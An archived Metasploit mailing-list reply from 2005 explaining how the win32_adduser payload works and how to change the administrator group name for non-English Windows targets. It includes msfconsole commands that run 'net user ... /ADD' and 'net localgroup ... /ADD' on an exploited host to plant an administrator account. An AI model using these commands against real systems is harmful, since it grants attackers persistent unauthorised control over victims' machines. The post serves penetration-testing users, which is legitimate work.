Metasploit mailing list archives

Win32 net user /add payload

From: hdm at metasploit.com (H D Moore)
Date: Thu, 3 Mar 2005 18:34:41 -0600

Hello,

The win32_adduser payload is actually just a wrapper around the
"win32_exec" payload. If you are expoiting any non-English target, the
administrator group name has to be changed. The easy way is to just run
the command manually with win32_exec:

msf exploit_name(win32_exec) >  set CMD "cmd.exe /c net user USER
PASS /ADD && net localgroup ADMINGROUP USER /ADD"

msf exploit_name(win32_exec) > exploit

In the future, we may add an option to this payload to specify the
language or just the name of the group -- it seems to come up often
enough =)

-HD